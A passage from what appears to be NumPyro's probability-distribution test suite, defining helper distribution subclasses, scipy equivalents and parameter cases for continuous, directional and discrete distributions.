**kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = (np.array([0.0]), np.array([1.0]))\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises(self: SineSkewedVonMises, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = (np.array([0.0, -1.234]), np.array([1.0, 10.0]))\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(\n self: SineSkewedVonMisesBatched, skewness=None\n):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(\n mixing_distribution=mixing_distribution,\n component_distribution=component_dist,\n )\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(\n self.component_distribution, loc=loc, scale=scale\n )\n return vmap_over.dispatch(dist.MixtureSameFamily)(\n self, _component_distribution=component_distribution\n )\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(\n loc=loc, covariance_matrix=covariance_matrix\n )\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(\n mixing_distribution=mixing_distribution,\n component_distribution=component_dist,\n )\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(\n self, _component_distribution=component_distribution\n )\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [\n dist.Normal(loc=loc_, scale=scale_) for loc_, scale_ in zip(locs, scales)\n ]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(\n mixing_distribution=mixing_distribution,\n component_distributions=component_dists,\n )\n\n @property\n def locs(self):\n # hotfix for vmapping tests, which cannot easily check non-array attributes\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [\n vmap_over(d, loc=locs, scale=scales) for d in self.component_distributions\n ]\n return vmap_over.dispatch(dist.MixtureGeneral)(\n self, _component_distributions=component_distributions\n )\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [\n dist.MultivariateNormal(loc=loc_, covariance_matrix=covariance_matrix)\n for loc_, covariance_matrix in zip(locs, covariance_matrices)\n ]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(\n mixing_distribution=mixing_distribution,\n component_distributions=component_dists,\n )\n\n @property\n def locs(self):\n # hotfix for vmapping tests, which cannot easily check non-array attributes\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [\n vmap_over(d, loc=locs) for d in self.component_distributions\n ]\n return vmap_over.dispatch(dist.MixtureGeneral)(\n self, _component_distributions=component_distributions\n )\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {\"rate\": constraints.positive, \"gate_logits\": constraints.real}\n pytree_data_fields = (\"rate\",)\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(\n self: ZeroInflatedPoissonLogits, rate=None, gate_logits=None\n):\n dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(\n self,\n base_dist=vmap_over(self.base_dist, rate=rate),\n gate_logits=gate_logits,\n gate=gate_logits,\n )\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {\"loc\": constraints.real, \"scale\": constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: \"FoldedNormal\", loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(\n self, base_dist=vmap_over(self.base_dist, loc=loc, scale=scale)\n )\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = [\"loc\", \"correlation\", \"conditional_precision\"]\n\n def __init__(\n self,\n loc,\n correlation,\n conditional_precision,\n adj_matrix,\n *,\n is_sparse=True,\n validate_args=None,\n ):\n super().__init__(\n loc,\n correlation,\n conditional_precision,\n adj_matrix,\n is_sparse=True,\n validate_args=validate_args,\n )\n\n\n_DIST_MAP = {\n dist.AsymmetricLaplace: lambda loc, scale, asymmetry: osp.laplace_asymmetric(\n asymmetry, loc=loc, scale=scale\n ),\n dist.BernoulliProbs: lambda probs: osp.bernoulli(p=probs),\n dist.BernoulliLogits: lambda logits: osp.bernoulli(p=_to_probs_bernoulli(logits)),\n dist.Beta: lambda con1, con0: osp.beta(con1, con0),\n dist.BetaProportion: lambda mu, kappa: osp.beta(mu * kappa, (1 - mu) * kappa),\n dist.BinomialProbs: lambda probs, total_count: osp.binom(n=total_count, p=probs),\n dist.BinomialLogits: lambda logits, total_count: osp.binom(\n n=total_count, p=_to_probs_bernoulli(logits)\n ),\n dist.Cauchy: lambda loc, scale: osp.cauchy(loc=loc, scale=scale),\n dist.Chi2: lambda df: osp.chi2(df),\n dist.Dirichlet: lambda conc: osp.dirichlet(conc),\n dist.Exponential: lambda rate: osp.expon(scale=jnp.reciprocal(rate)),\n dist.Gamma: lambda conc, rate: osp.gamma(conc, scale=1.0 / rate),\n dist.GeometricProbs: lambda probs: osp.geom(p=probs, loc=-1),\n dist.GeometricLogits: lambda logits: osp.geom(\n p=_to_probs_bernoulli(logits), loc=-1\n ),\n dist.Gumbel: lambda loc, scale: osp.gumbel_r(loc=loc, scale=scale),\n dist.HalfCauchy: lambda scale: osp.halfcauchy(scale=scale),\n dist.HalfNormal: lambda scale: osp.halfnorm(scale=scale),\n dist.InverseGamma: lambda conc, rate: osp.invgamma(conc, scale=rate),\n dist.Laplace: lambda loc, scale: osp.laplace(loc=loc, scale=scale),\n dist.LogNormal: lambda loc, scale: osp.lognorm(s=scale, scale=jnp.exp(loc)),\n dist.LogUniform: lambda a, b: osp.loguniform(a, b),\n dist.MultinomialProbs: lambda probs, total_count: osp.multinomial(\n n=total_count, p=probs\n ),\n dist.MultinomialLogits: lambda logits, total_count: osp.multinomial(\n n=total_count, p=_to_probs_multinom(logits)\n ),\n dist.MultivariateNormal: _mvn_to_scipy,\n dist.MultivariateStudentT: _multivariate_t_to_scipy,\n dist.LowRankMultivariateNormal: _lowrank_mvn_to_scipy,\n dist.Normal: lambda loc, scale: osp.norm(loc=loc, scale=scale),\n dist.Pareto: lambda scale, alpha: osp.pareto(alpha, scale=scale),\n dist.Poisson: lambda rate: osp.poisson(rate),\n dist.StudentT: lambda df, loc, scale: osp.t(df=df, loc=loc, scale=scale),\n dist.Uniform: lambda a, b: osp.uniform(a, b - a),\n dist.Logistic: lambda loc, scale: osp.logistic(loc=loc, scale=scale),\n dist.VonMises: lambda loc, conc: osp.vonmises(\n loc=np.array(loc, dtype=np.float64), kappa=np.array(conc, dtype=np.float64)\n ),\n dist.Weibull: lambda scale, conc: osp.weibull_min(\n c=conc,\n scale=scale,\n ),\n _TruncatedNormal: _truncnorm_to_scipy,\n}\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\nCONTINUOUS = [\n T(dist.AsymmetricLaplace, 1.0, 0.5, 1.0),\n T(dist.AsymmetricLaplace, np.array([1.0, 2.0]), 2.0, 2.0),\n T(dist.AsymmetricLaplace, np.array([[1.0], [2.0]]), 2.0, np.array([3.0, 5.0])),\n T(dist.AsymmetricLaplaceQuantile, 0.0, 1.0, 0.5),\n T(dist.AsymmetricLaplaceQuantile, np.array([1.0, 2.0]), 2.0, 0.7),\n T(\n dist.AsymmetricLaplaceQuantile,\n np.array([[1.0], [2.0]]),\n 2.0,\n np.array([0.2, 0.8]),\n ),\n T(dist.Beta, 0.2, 1.1),\n T(dist.Beta, 1.0, np.array([2.0, 2.0])),\n T(dist.Beta, 1.0, np.array([[1.0, 1.0], [2.0, 2.0]])),\n T(dist.BetaProportion, 0.2, 10.0),\n T(dist.BetaProportion, 0.51, np.array([2.0, 1.0])),\n T(dist.BetaProportion, 0.5, np.array([[4.0, 4.0], [2.0, 2.0]])),\n T(dist.Chi2, 2.0),\n T(dist.Chi2, np.array([0.3, 1.3])),\n T(dist.Cauchy, 0.0, 1.0),\n T(dist.Cauchy, 0.0, np.array([1.0, 2.0])),\n T(dist.Cauchy, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.Dirichlet, np.array([1.7])),\n T(dist.Dirichlet, np.array([0.2, 1.1])),\n T(dist.Dirichlet, np.array([[0.2, 1.1], [2.0, 2.0]])),\n T(\n dist.EulerMaruyama,\n np.array([0.0, 0.1, 0.2]),\n sde_fn1,\n dist.Normal(0.1, 1.0),\n ),\n T(\n dist.EulerMaruyama,\n np.array([0.0, 0.1, 0.2]),\n sde_fn2,\n dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),\n ),\n T(\n dist.EulerMaruyama,\n np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),\n sde_fn2,\n dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),\n ),\n T(\n dist.EulerMaruyama,\n np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),\n sde_fn2,\n dist.Normal(jnp.array([[0.0, 1.0], [2.0, 3.0]]), 1e-2).to_event(1),\n ),\n T(dist.Exponential, 2.0),\n T(dist.Exponential, np.array([4.0, 2.0])),\n T(dist.Gamma, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Gamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.GaussianRandomWalk, 0.1, 10),\n T(dist.GaussianRandomWalk, np.array([0.1, 0.3, 0.25]), 10),\n T(\n dist.GaussianCopulaBeta,\n np.array([7.0, 2.0]),\n np.array([4.0, 10.0]),\n np.array([[1.0, 0.75], [0.75, 1.0]]),\n ),\n T(dist.GaussianCopulaBeta, 2.0, 1.5, np.eye(3)),\n T(dist.GaussianCopulaBeta, 2.0, 1.5, np.full((5, 3, 3), np.eye(3))),\n T(dist.Gompertz, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Gompertz, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.Gumbel, 0.0, 1.0),\n T(dist.Gumbel, 0.5, 2.0),\n T(dist.Gumbel, np.array([0.0, 0.5]), np.array([1.0, 2.0])),\n T(FoldedNormal, 2.0, 4.0),\n T(FoldedNormal, np.array([2.0, 50.0]), np.array([4.0, 100.0])),\n T(dist.HalfCauchy, 1.0),\n T(dist.HalfCauchy, np.array([1.0, 2.0])),\n T(dist.HalfNormal, 1.0),\n T(dist.HalfNormal, np.array([1.0, 2.0])),\n T(_ImproperWrapper, constraints.positive, (), (3,)),\n T(dist.InverseGamma, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.InverseGamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),\n T(dist.Kumaraswamy, 10.0, np.array([2.0, 3.0])),\n T(dist.Kumaraswamy, np.array([1.7]), np.array([[2.0], [3.0]])),\n T(dist.Kumaraswamy, 0.6, 0.5),\n T(dist.Laplace, 0.0, 1.0),\n T(dist.Laplace, 0.5, np.array([1.0, 2.5])),\n T(dist.Laplace, np.array([1.0, -0.5]), np.array([2.3, 3.0])),\n T(dist.LKJ, 2, 0.5, \"onion\"),\n T(dist.LKJ, 5, np.array([0.5, 1.0, 2.0]), \"cvine\"),\n T(dist.LKJCholesky, 2, 0.5, \"onion\"),\n T(dist.LKJCholesky, 2, 0.5, \"cvine\"),\n T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), \"onion\"),\n pytest.param(\n *T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), \"cvine\"),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n pytest.param(\n *T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), \"onion\"),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), \"cvine\"),\n T(dist.Logistic, 0.0, 1.0),\n T(dist.Logistic, 1.0, np.array([1.0, 2.0])),\n T(dist.Logistic, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.LogNormal, 1.0, 0.2),\n T(dist.LogNormal, -1.0, np.array([0.5, 1.3])),\n T(dist.LogNormal, np.array([0.5, -0.7]), np.array([[0.1, 0.4], [0.5, 0.1]])),\n T(dist.LogUniform, 1.0, 2.0),\n T(dist.LogUniform, 1.0, np.array([2.0, 3.0])),\n T(dist.LogUniform, np.array([1.0, 2.0]), np.array([[3.0], [4.0]])),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(6).reshape(3, 2),\n np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]),\n np.array([[1.0, 0], [0.4, 1]]),\n ),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(12).reshape((2, 3, 2)),\n np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]) * np.ones((2, 3, 3)),\n np.array([[1.0, 0], [0.4, 0.5]]) * np.ones((2, 2, 2)),\n ),\n T(\n dist.MatrixNormal,\n 1.0 * np.arange(36).reshape((2, 3, 3, 2)),\n np.identity(3),\n np.identity(2),\n ),\n T(dist.MultivariateNormal, 0.0, np.array([[1.0, 0.5], [0.5, 1.0]]), None, None),\n T(\n dist.MultivariateNormal,\n np.array([1.0, 3.0]),\n None,\n np.array([[1.0, 0.5], [0.5, 1.0]]),\n None,\n ),\n T(\n dist.MultivariateNormal,\n np.array([1.0, 3.0]),\n None,\n np.array([[[1.0, 0.5], [0.5, 1.0]]]),\n None,\n ),\n T(\n dist.MultivariateNormal,\n np.array([2.0]),\n None,\n None,\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateNormal,\n np.arange(6, dtype=np.float32).reshape((3, 2)),\n None,\n None,\n np.array([[1.0, 0.0], [0.0, 1.0]]),\n ),\n T(\n dist.MultivariateNormal,\n 0.0,\n None,\n np.broadcast_to(np.identity(3), (2, 3, 3)),\n None,\n ),\n T(\n dist.CAR,\n 1.2,\n np.array([-0.2, 0.3]),\n 0.1,\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n dist.CAR,\n np.array([0.0, 1.0, 3.0, 4.0]),\n 0.1,\n np.array([0.3, 0.7]),\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n _SparseCAR,\n np.array([[0.0, 1.0, 3.0, 4.0], [2.0, -1.0, -3.0, 2.0]]),\n 0.0,\n 0.1,\n np.array(\n [\n [0.0, 1.0, 1.0, 0.0],\n [1.0, 0.0, 0.0, 1.0],\n [1.0, 0.0, 0.0, 1.0],\n [0.0, 1.0, 1.0, 0.0],\n ]\n ),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n 0.0,\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([1.0, 3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([1.0, 3.0]),\n np.array([[[1.0, 0.0], [0.5, 1.0]]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.array([3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.arange(6, dtype=np.float32).reshape((3, 2)),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n 15.0,\n np.ones(3),\n np.broadcast_to(np.identity(3), (2, 3, 3)),\n ),\n T(\n dist.MultivariateStudentT,\n np.array(7.0),\n np.array([1.0, 3.0]),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.MultivariateStudentT,\n np.arange(20, 22, dtype=jnp.float32),\n np.ones(3),\n np.broadcast_to(jnp.identity(3), (2, 3, 3)),\n ),\n T(\n dist.MultivariateStudentT,\n np.arange(20, 26, dtype=jnp.float32).reshape((3, 2)),\n np.ones(2),\n np.array([[1.0, 0.0], [0.5, 1.0]]),\n ),\n T(\n dist.LowRankMultivariateNormal,\n np.zeros(2),\n np.array([[1.0], [0.0]]),\n np.array([1.0, 1.0]),\n ),\n T(\n dist.LowRankMultivariateNormal,\n np.arange(6, dtype=jnp.float32).reshape((2, 3)),\n np.arange(6, dtype=jnp.float32).reshape((3, 2)),\n np.array([1.0, 2.0, 3.0]),\n ),\n T(dist.Normal, 0.0, 1.0),\n T(dist.Normal, 1.0, np.array([1.0, 2.0])),\n T(dist.Normal, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),\n T(dist.Pareto, 1.0, 2.0),\n T(dist.Pareto, np.array([1.0, 0.5]), np.array([0.3, 2.0])),\n T(dist.Pareto, np.array([[1.0], [3.0]]), np.array([1.0, 0.5])),\n T(dist.RelaxedBernoulliLogits, 2.0, -10.0),\n T(dist.RelaxedBernoulliLogits, np.array([1.0, 3.0]), np.array([3.0, 8.0])),\n T(dist.SoftLaplace, 1.0, 1.0),\n T(dist.SoftLaplace, np.array([-1.0, 50.0]), np.array([4.0, 100.0])),\n T(dist.StudentT, 1.0, 1.0, 0.5),\n T(dist.StudentT, 2.0, np.array([1.0, 2.0]), 2.0),\n T(dist.StudentT, np.array([3.0, 5.0]), np.array([[1.0], [2.0]]), 2.0),\n T(_TruncatedCauchy, 0.0, 1.0, -1.0, None),\n T(_TruncatedCauchy, 0.0, np.array([1.0, 2.0]), 1.0, None),\n T(\n _TruncatedCauchy,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n np.array([-2.0, 2.0]),\n None,\n ),\n T(_TruncatedCauchy, 0.0, 1.0, None, 1.0),\n T(_TruncatedCauchy, 0.0, 1.0, -1.0, 1.0),\n T(_TruncatedNormal, 0.0, 1.0, -1.0, None),\n T(_TruncatedNormal, -1.0, np.array([1.0, 2.0]), 1.0, None),\n T(\n _TruncatedNormal,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n np.array([-2.0, 2.0]),\n None,\n ),\n T(_TruncatedNormal, -1.0, 2.0, 1.0, 5.0),\n T(_TruncatedNormal, np.array([-1.0, 4.0]), 2.0, None, 5.0),\n T(_TruncatedNormal, -1.0, np.array([2.0, 3.0]), 1.0, None),\n T(_TruncatedNormal, -1.0, 2.0, np.array([-6.0, 4.0]), np.array([-4.0, 6.0])),\n T(\n _TruncatedNormal,\n np.array([0.0, 1.0]),\n np.array([[1.0], [2.0]]),\n None,\n np.array([-2.0, 2.0]),\n ),\n T(dist.TwoSidedTruncatedDistribution, dist.Laplace(0.0, 1.0), -2.0, 3.0),\n T(dist.Uniform, 0.0, 2.0),\n T(dist.Uniform, 1.0, np.array([2.0, 3.0])),\n T(dist.Uniform, np.array([0.0, 0.0]), np.array([[2.0], [3.0]])),\n T(dist.Weibull, 0.2, 1.1),\n T(dist.Weibull, 2.8, np.array([2.0, 2.0])),\n T(dist.Weibull, 1.8, np.array([[1.0, 1.0], [2.0, 2.0]])),\n T(\n _GaussianMixture,\n np.ones(3) / 3.0,\n np.array([0.0, 7.7, 2.1]),\n np.array([4.2, 7.7, 2.1]),\n ),\n T(\n _Gaussian2DMixture,\n np.array([0.2, 0.5, 0.3]),\n np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean\n np.array(\n [\n [\n [0.1, -0.2],\n [-0.2, 1.0],\n ],\n [\n [0.75, 0.0],\n [0.0, 0.75],\n ],\n [\n [1.0, 0.5],\n [0.5, 0.27],\n ],\n ]\n ), # Covariance\n ),\n T(\n _GeneralMixture,\n np.array([0.2, 0.3, 0.5]),\n np.array([0.0, 7.7, 2.1]),\n np.array([4.2, 1.7, 2.1]),\n ),\n T(\n _General2DMixture,\n np.array([0.2, 0.5, 0.3]),\n np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean\n np.array(\n [\n [\n [0.1, -0.2],\n [-0.2, 1.0],\n ],\n [\n [0.75, 0.0],\n [0.0, 0.75],\n ],\n [\n [1.0, 0.5],\n [0.5, 0.27],\n ],\n ]\n ), # Covariance\n ),\n]\n\nDIRECTIONAL = [\n T(dist.VonMises, 2.0, 10.0),\n T(dist.VonMises, 2.0, np.array([150.0, 10.0])),\n T(dist.VonMises, np.array([1 / 3 * np.pi, -1.0]), np.array([20.0, 30.0])),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n 0.0,\n 0.0,\n 5.0,\n 6.0,\n 2.0,\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n T(\n dist.SineBivariateVonMises,\n 3.003,\n -1.343,\n 5.0,\n 6.0,\n 2.0,\n ),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n -1.232,\n -1.3430,\n 3.4,\n 2.0,\n 1.0,\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n pytest.param(\n *T(\n dist.SineBivariateVonMises,\n np.array([math.pi - 0.2, 1.0]),\n np.array([0.0, 1.0]),\n np.array([5.0, 5.0]),\n np.array([7.0, 0.5]),\n None,\n np.array([0.5, 0.1]),\n ),\n marks=pytest.mark.skipif(\"CI\" in os.environ, reason=\"reduce time for CI\"),\n ),\n T(dist.ProjectedNormal, np.array([0.0, 0.0])),\n T(dist.ProjectedNormal, np.array([[2.0, 3.0]])),\n T(dist.ProjectedNormal, np.array([0.0, 0.0, 0.0])),\n T(dist.ProjectedNormal, np.array([[-1.0, 2.0, 3.0]])),\n T(SineSkewedUniform, np.array([-math.pi / 4, 0.1])),\n T(SineSkewedVonMises, np.array([0.342355])),\n T(SineSkewedVonMisesBatched, np.array([[0.342355, -0.0001], [0.91, 0.09]])),\n]\n\nDISCRETE = [\n T(dist.BetaBinomial, 2.0, 5.0, 10),\n T(\n dist.BetaBinomial,\n np.array([2.0, 4.0]),\n np.array([5.0, 3.0]),\n np.array([10, 12]),\n ),\n T(dist.BernoulliProbs, 0.2),\n T(dist.BernoulliProbs, np.array([0.2, 0.7])),\n T(dist.BernoulliLogits, np.array([-1.0, 3.0])),\n T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([10, 2])),\n T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([5, 8])),\n T(dist.BinomialLogits, np.array([-1.0, 3.0]), np.array([5, 8])),\n T(dist.CategoricalProbs, np.array([1.0])),\n T(dist.CategoricalProbs, np.array([0.1, 0.5, 0.4])),\n T(dist.CategoricalProbs, np.array([[0.1, 0.5, 0.4], [0.4, 0.4, 0.2]])),\n T(dist.CategoricalLogits, np.array([-5.0])),\n T(dist.CategoricalLogits, np.array([1.0, 2.0, -2.0])),\n T(dist.CategoricalLogits, np.array([[-1, 2.0, 3.0], [3.0, -4.0, -2.0]])),\n T(dist.Delta, 1),\n T(dist.Delta, np.array([0.0, 2.0])),\n T(dist.Delta, np.array([0.0, 2.0]), np.array([-2.0, -4.0])),\n T(dist.DirichletMultinomial, np.array([1.0, 2.0, 3.9]), 10),\n T(dist.DirichletMultinomial, np.array([0.2, 0.7, 1.1]), np.array([5, 5])),\n T(dist.GammaPoisson, 2.0, 2.0),\n T(dist.GammaPoisson, np.array([6.0, 2]), np.array([2.0, 8.0])),\n T(dist.GeometricProbs, 0.2),\n T(dist.GeometricProbs, np.array([0.2, 0.7])),\n T(dist.GeometricLogits, np.array([-1.0, 3.0])),\n T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), 10),\n T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), np.array([5, 8])),\n T(dist.MultinomialLogits, np.array([-1.0, 3.0]), np.array([[5], [8]])),\n T(dist.NegativeBinomialProbs, 10, 0.2),\n T(dist.NegativeBinomialProbs, 10, np.array([0.2, 0.6])),\n T(dist.NegativeBinomialProbs, np.array([4.2, 10.7, 2.1]), 0.2),\n T(\n dist.NegativeBinomialProbs,\n np.array([4.2, 10.7, 2.1]),\n np.array([0.2, 0.6, 0.5]),\n ),\n T(dist.NegativeBinomialLogits, 10, -2.1),\n T(dist.NegativeBinomialLogits, 10, np.array([-5.2, 2.1])),\n T(dist.NegativeBinomialLogits, np.array([4.2, 10.7, 2.1]), -5.2),\n T(\n dist.NegativeBinomialLogits,\n np.array([4.2, 7.7, 2.1]),\n np.array([4.2, 0.7, 2.1]),\n ),\n T(dist.NegativeBinomial2, 0.3, 10),\n T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), 10),\n T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), np.array([10.2, 20.7, 2.1])),\n T(dist.OrderedLogistic, -2, np.array([-10.0, 4.0, 9.0])),\n T(dist.OrderedLogistic, np.array([-4, 3, 4, 5]), np.array([-1.5])),\n T(dist.DiscreteUniform, -2, np.array([-1.0, 4.0, 9.0])),\n T(dist.DiscreteUniform, np.array([-4, 3, 4, 5]), np.array([6])),\n T(dist.Poisson, 2.0),\n T(dist.Poisson, np.array([2.0, 3.0, 5.0])),\n T(SparsePoisson, 2.0),\n T(SparsePoisson, np.array([2.0, 3.0, 5.0])),\n T(SparsePoisson, 2),\n T(dist.ZeroInflatedPoisson, 0.6, 2.0),\n T(dist.ZeroInflatedPoisson, np.array([0.2, 0.7, 0.3]), np.array([2.0, 3.0, 5.0])),\n T(ZeroInflatedPoissonLogits, 2.0, 3.0),\n T(\n ZeroInflatedPoissonLogits,\n np.array([0.2, 4.0, 0.3]),\n np.array([2.0, -3.0, 5.0]),\n ),\n]\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-6\n\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5), shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound)\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, 